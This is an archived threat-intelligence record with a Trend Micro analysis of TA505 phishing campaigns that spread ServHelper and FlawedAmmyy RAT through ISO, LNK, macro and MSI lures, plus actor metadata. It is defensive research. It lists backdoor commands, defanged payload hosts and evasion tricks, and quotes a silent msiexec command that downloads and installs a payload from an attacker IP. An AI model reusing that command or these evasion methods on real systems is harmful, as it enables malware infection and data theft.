{ "id": "68545478-27b2-45b5-9f0f-d5517b53bf5e", "created_at": "2026-04-06T00:12:10.062369Z", "updated_at": "2026-04-10T13:11:30.977469Z", "deleted_at": null, "sha1_hash": "f154aa01749bc4331a34653089562f1b2dbae3ff", "title": "TA505: Variety in Use of ServHelper and FlawedAmmyy", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 968375, "plain_text": "TA505: Variety in Use of ServHelper and FlawedAmmyy\r\nBy By: Trend Micro Aug 27, 2019 Read time: 9 min (2545 words)\r\nPublished: 2019-08-27 · Archived: 2026-04-05 14:24:24 UTC\r\nTA505 continues to show that as a cybercriminal group, they intend to wreak as much havoc while maximizing\r\npotential profits. Given the group's active campaigns since our updates in June and July, we continued following\r\ntheir latest campaigns. Just like in previous operations, they continue to make small changes, such as targeting\r\nother countries, entities, or the combination of techniques used for deployment, for each campaign. Despite the\r\nchanges, TA505 continues to use either FlawedAmmyy RAT (remote access trojan) or ServHelper as payloads.\r\nHowever, over the last nine campaigns since our June report, they also started using .ISO image attachments as the\r\npoint of entry, as well as a .NET downloader, a new style for macro delivery, a newer version of ServHelper, and a\r\n.DLL variant of FlawedAmmyy downloader. The group also started targeting new countries, such as Turkey,\r\nSerbia, Romania, Korea, Canada, the Czech Republic, and Hungary.\r\n.ISO, enabled macros for entry dropping ServHelper or FlawedAmmyy\r\nWe noticed that the group became active again in the middle of July, targeting Turkish and Serbian banks with\r\nemails that had .ISO file attachments as a means of entry. While the method is not newnews- cybercrime-and-digital-threats, the change in file type may yield successful infections given the unusual malware delivery\r\ntechnique. Emails with an attached .ISO image is an .LNK file that uses command line msiexec to execute an MSI\r\nfile from a URL such as hxxp://139[.]180[.]195[.]36/pm2.\r\nFigure 1. Infection chains for ServHelper installation\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 1 of 14\n\nFigure 2. A sample of an .ISO file with an embedded .LNK file\r\nThe pm2 file contains and runs another executable, which is an installer file created using Nullsoft Scriptable\r\nInstall System (NSIS), a free script-driven installer authoring tool for Windows. This NSIS-encapsulated file then\r\ninstalls ServHelper\r\n.\r\nFigure 3. .LNK shortcut in .ISO file\r\nIn another sample we obtained, we found an Excel attachment with malicious macros embedded in the file. The\r\nmacros directly download the file created using NSIS installer from hxxp://45[.]67[.]229[.]36/p2, which is the\r\nsame binary we found in the .ISO and .LNK files that install ServHelper.\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 2 of 14\n\nFigure 4. Email sample with an attached Excel file.\r\nIn another sample, the group made several updates with the versions of ServHelper, one of which included the\r\nstrings’ binary encrypted in Vigenère cipher.\r\nFigure 5. Encrypted string\r\nWe observed that some of the samples still had errors in the cipher routine. In another routine that was supposed to\r\nresult in a stack overflow, it also displayed an error message. We suspect the developer of this particular sample\r\ncopied and pasted a stack overflow code.\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 3 of 14\n\nFigure 6. Vigenère cipher in ServHelper and the Delphi code in stack overflow\r\nAnother updated version included encrypted contents of the C\u0026C communication via HTTP (previous versions\r\nhad C\u0026C request and response information in plain text). The encrypted sample — via XOR encoding/URL\r\nencoding — also received a response from the C\u0026C encrypted with XOR. The XOR key is embedded in the\r\nbinary; in this case, the key was “lol”.\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 4 of 14\n\nFigure 7. XOR Encrypted C\u0026C communication\r\nWe also found two new backdoor commands, runmem and runmemxor, that can run additional .DLL commands in\r\nmemory.\r\nshell: Execute command\r\nrunmem: Download .DLL in memory and run\r\nrunmemxor: Download XOR encrypted .DLL and decrypt and run\r\nzakr: Register autorun\r\nslp: Set sleep time\r\nload: Download executable file and run\r\nloaddll: Download .DLL and run\r\nselfkill: Uninstall itself\r\nThe newer version shows that the developers behind ServHelper continued to upgrade it to evade detection and\r\nadd more functions, possibly for even more iterations in the future. In a campaign targeting thousands of Korean\r\nbusinesses, we found an .ISO attachment — used as the malicious downloader — disguised as a confirmed flight\r\nticket from a popular airline.\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 5 of 14\n\nFigure 8. TA505 spoofing an airline company as a malicious file attachment.\r\nIn a slightly different technique still targeting Korean enterprises, the .ISO files either contained an .LNK file such\r\nas the previous iteration, or a .NET-compiled downloader.\r\nFigure 9. Infection chains for FlawedAmmyy installation\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 6 of 14\n\nFigure 10. Screenshot of decompiled script from the .ISO file with a .NET downloader embedded in the e-ticket.\r\nOther samples also included an Excel file attachment with malicious macros that install FlawedAmmyy, or a URL\r\nincluded in the email that supposedly downloads the file needed to download the malware.\r\nFigure 11. .LNK embedded in the .ISO file\r\nBoth versions tried to download and execute files km1 or km2, an .MSI installer that executes the FlawedAmmyy\r\ndownloader. This, in turn, downloads an RC4-encrypted FlawedAmmyy RAT payload from\r\nhxxp://92[.]38[.]135[.]67/2.dat or hxxp://27[.]102[.]70[.]196/1.dat that automatically decrypts and executes the\r\nmalware. This was also previously documented by an ESET security researcher. On the samples that used a URL\r\nin the email content, we also noticed that the type of document file that it downloaded depended on the URL that\r\nthe user opened. Opening the documents will enable the macros and download the same FlawedAmmyy\r\ndownloader as the .ISO file iteration from hxxp://92[.]38[.]135[.]67 or hxxp://27[.]102[.]70[.]196, with filenames\r\nk1 or k2. In a campaign that targeted Romanian banks, emails used the subject “Fw: copie COC L5H3” and came\r\nwith an .ISO image attachment.\r\nFigure 12. Infection chains for ServHelper installation with .NET downloader\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 7 of 14\n\nFurther analysis revealed a .NET downloader embedded in the image, along with routines that were almost similar\r\nto those used in the campaign observed targeting Turkish banks. The .NET downloads jm1 — an .MSI installer —\r\nthat installs another NSIS installer, leading to a ServHelper infection in the system.\r\nFigure 13. The decompiled .NET downloader\r\nIn another routine, an Excel file attachment downloads the NSIS installer once the user enables the malicious\r\nmacros from hxxp://109[.]234[.]37[.]15:80/j1 or hxxp://169[.]239[.]128[.]170/j1. Both URLs contain the same\r\nbinaries as the ones that the jm1 file installs.\r\nMore typical TA505 campaigns, with old and new targets\r\nThe group's more typical payload and routine involves the use of ServHelper and FlawedAmmy RAT and\r\nattaching a document embedded with malicious commands and strings. One variant targets Serbian banks with\r\nsubjects pertaining to “payments” or “invoices” applicable in several European languages. Enabling the macros of\r\nthe Excel file downloads a file created using NSIS installer with ServHelper from 79[.]141[.]168[.]105 or\r\n195[.]123[.]213[.]126. We found another routine from a campaign targeting government agencies in Saudi Arabia,\r\nOman, and Qatar with another type of .XLS or .DOC attachment. The emails used in these campaigns used\r\nsubjects pertaining to finance or urgent concerns on insurance policies. A similar campaign targeting Turkish\r\neducational and government institutions used email subjects pertaining to invoice information or personnel\r\npayroll, and Visual Basic for Applications (VBA) .XLS or VBA .DOC macros. Similar to the routine variant in\r\nFigure 6, the Excel VBA macros retrieve the FlawedAmmyy downloader from hxxp://195[.]123[.]245[.]185/r1 or\r\nhxxp://185[.]225[.]17[.]5/r1, in then decrypts and executes FlawedAmmyy RAT from\r\nhxxp://185[.]225[.]17[.]5/2.dat or hxxp://195[.]123[.]245[.]185/1.dat. Meanwhile, the .DOC VBA macros\r\nretrieves the MSI files from hxxp://195.123.245.185/km or hxxp://185.225.17.5/km, which executes the NSIS\r\ninstaller for ServHelper installation. Similar to one of the routines depicted in Figure 9, the group also reused one\r\nof the email samples but changed the targets to India and the United States, and added content referring to\r\ninvoices. The email may contain different documents, but the URLs for downloading ServHelper as the payload\r\nremain the same.\r\nFigure 14. One of the more typical techniques employed by TA505.\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 8 of 14\n\n.DLL downloaders that deliver FlawedAmmyy and newly styled macros\r\nIn the first week of August, we noticed the group using a different approach and style to fetch the downloaders via\r\nmacros. While FlawedAmmyy RAT was still the final payload, the downloader was different — this operation\r\nused a .DLL variant. This particular campaign targeted Canada with subjects asking for confirmation of numbers\r\nfrom the marketing department.\r\nFigure 15. Infection chain with .DLL FlawedAmmyy downloader\r\nThe attached document asks the user to enable the macros, which creates an Internet Explorer object instance.\r\nThis loads a text file from a hardcoded website, wherein the content of the document file is parsed through and the\r\ninner text of the document is loaded. Our analysis showed that this is likely done so the malicious file can bypass\r\nsome firewall rules, since the communication uses Internet Explorer.\r\nFigure 16. Sample document with malicious macros.\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 9 of 14\n\nFigure 17. Text file using Internet Explorer for communication to bypass firewall rules.\r\nThe downloaded file is a text file with a single number on each line. The macros process the downloaded payload\r\nwith each number encrypted in XOR with a constant hardcoded value of 106. The result is an executable file\r\nwritten to the disc and executed.\r\nFigure 18. Executable file written to disk and executed\r\nThe executed .DLL is packed using two layers: a custom packer for the first stage and UPX (Ultimate Packer for\r\nExecutables) for the second stage. The unpacked payload in memory is also a .DLL — it's the first time we've\r\nseen a FlawedAmmyy downloader as a .DLL. As we further analyzed the main behavior by downloading the\r\nencrypted FlawedAmmyy RAT and decrypted it with RC4, we found that it was similar to the previous\r\ncampaigns, but with a few updates. The first update is the use of the socket API to send an HTTP request instead\r\nof wininet or winhttp API to download an encrypted FlawedAmmyy, building an HTTP header by itself. This\r\ncould likely be an effort to bypass API hooking for HTTP.\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 10 of 14\n\nFigure 19. Send HTTP request using socket API\r\nThe second change: The decrypted FlawedAmmyy RAT is now saved as dllhots.exe in C:\\temp\\ (it used to be\r\nsaved as wsus.exe). Lastly, this new FlawedAmmyy downloader overwrites some PE header members with\r\nrandom values. Specifically, it overwrites the checksum, the address of relocation table in DOS header, and the\r\nchecksum in optional headers.\r\nFigure 20. Original PE header members (left) vs. overwritten header members (right)\r\nThe decrypted FlawedAmmyy RAT slightly different from the one that TA505 reused over its past campaigns.\r\nWhile the previous strings had the modified AmmyyAdmin binary since the source code was leaked, TA505\r\nchanged the strings in this sample to PopssAdmin. This may bypass detection rules if the systems’ lists were not\r\nupdated.\r\nFigure 21. Significant changes in the binary\r\nIn another sample targeting South Korea, the difference with the previous case is the XOR encryption hardcoded\r\nat 180. We also found that the file delivered is an .MSI executable containing the same .DLL FlawedAmmyy\r\ndownloader. From the document embedded with the malicious macros, the macro code calls “Run” on the\r\nWScript.Shell object. Most of the strings forming the final command are stored in the “Tag” properties of a form\r\nembedded in the document.\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 11 of 14\n\nFigure 22. Sample document in Korean asking the user to enable the macros.\r\nFigure 23. Final command strings in document’s “tag” properties.\r\nThe final command executes the download and installation of the .MSI file into\r\nC:\\Windows\\System32\\msiexec.exe\" back=13 error=continue /i http://92[.]38[.]135[.]99/99.msi /q\r\nOnLoad=\"c:\\windows\\notepad.exe\r\nFigure 24. .MSI file installed in the system\r\nFrom the parameters above, “/i” means install, “/q” means quiet. The other three parameters do not appear to be\r\nused at all, as reported in the install log (by adding /L*V \"C:\\example.log\" parameter). The .MSI file is a\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 12 of 14\n\ndownloader with the .DLL FlawedAmmyy downloader inside; it retrieves the final payload, then decrypts and\r\nexecutes FlawedAmmyy RAT.\r\nFigure 25. Unused parameters from log\r\nAround the second week of August, we found a campaign targeting banks in the Czech Republic with subjects\r\npertaining to credit and NAV transfer. Analysis of the samples revealed that the document and macro style was\r\nsimilar to the Korean campaign that used.MSI files, but this campaign downloads from\r\nhxxp://185[.]17[.]122[.]220/555.msi or hxxp://159[.]69[.]54[.]146/555.msi. This .MSI file delivers the NSIS-packed ServHelper, and the binary shares the same C\u0026C server as the campaign targeting Saudi Arabia, Oman,\r\nQatar, and Turkey.\r\nSuspicious activity using ServHelper\r\nA campaign targeting China spoofed FedEx-themed emails with subjects pertaining to delivery problems, failures,\r\nor notifications. Instead of attachments, it had malicious URLs in the message content that lead to the download of\r\na malicious document named fedex.doc from hxxp://www.fedexdocs[.]top/fedex.doc or\r\nhxxp://www.fedexdocs[.]icu/fedex.doc. The VBA macro in the document downloads an NSIS-packed executable\r\nfrom hxxps://senddocs[.]icu/stelar.exe, which installs ServHelper. However, while initial analysis of the macro it\r\nused made us believe that this was from TA505, the macros’ obfuscation and style turned out to be more similar to\r\nthe ones described in this post, based on the code page, senders, and fast flux. This particular campaign did not\r\nmatch TA505’s technique. Thus we suspect that other cybercriminals purchased or borrowed ServHelper from the\r\nunderground market for this campaign.\r\nConclusion\r\nA number of ServHelper samples can be found in the wild, but some do not appear to be attributed to TA505. One\r\nsuch sample (reported by a researcher that used the Twitter handle James_inthe_box), delivered Remcos,\r\nseemingly with a TA505 pattern. However, we think it may be more likely that ServHelper is sold to other\r\nmalicious actors and tested on possible targets. In the long run, as more changes are added to the malware, this can\r\nmake attribution to specific groups more difficult.\r\nThe changes and adjustments that TA505 made from the original ServHelper and FlawedAmmyy routines may\r\nindicate that the group is experimenting and testing to determine which forms of obfuscation can bypass\r\ndetections, resulting in more financial returns. It's also possible that the changes in target countries and industries\r\nare driven by the group’s customers; targeting new victims and even returning to previously targeted countries and\r\norganizations with new techniques. This also gives TA505 more data on which types of files can be further used\r\nfor detection evasion, or even to deter attribution.\r\nGiven the frequency of changes in routines and deployment from our previous articles, we can expect TA505 to\r\ncome up with more methods for payload delivery, malware types, and combinations of previously used and new\r\nroutines. Further, as the malware is still being upgraded, more iterations can be expected in the future. If not\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 13 of 14\n\nremoved completely, malicious actors can still take control of computers, peripherals, sensitive information, and\r\nproprietary data.\r\nAs they continue to target businesses in different sectors, we can expect TA505 to keep using phishing and social\r\nengineering techniques to compromise systems. Enterprises are advised to strengthen their online systems,\r\nespecially email gatewaysnews- cybercrime-and-digital-threats. Enforce the principle of least privilege, as well as\r\na patch management and system update procedure to make sure the entire network is protected. Install redundant\r\nand multilayered protection systems from the gateway to the endpoint that can detect and block malicious URLS,\r\nemails, and attachments, as well as proactively monitornews- cybercrime-and-digital-threats other possible attack\r\nvectors.\r\nEnterprises can consider Trend Micro™ endpoint solutions such as Trend Micro Smart Protection\r\nSuitesproducts and Worry-Free™ Business Security. Both solutions can protect users and businesses from threats\r\nby detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro\r\nDeep Discovery™products has an email inspection layer that can protect enterprises by detecting malicious\r\nattachments and URLs. Trend Micro™ Hosted Email Securityservices is a no-maintenance cloud solution that\r\ndelivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced\r\ntargeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365products,\r\nGoogle Apps, and other hosted and on-premises email solutions. The indicators of compromise (IoCs) related to\r\nthese campaigns we observed are in this appendix.\r\nSource: https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html" ], "report_names": [ "ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html" ], "threat_actors": [ { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434330, "ts_updated_at": 1775826690, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f154aa01749bc4331a34653089562f1b2dbae3ff.pdf", "text": "https://archive.orkl.eu/f154aa01749bc4331a34653089562f1b2dbae3ff.txt", "img": "https://archive.orkl.eu/f154aa01749bc4331a34653089562f1b2dbae3ff.jpg" } }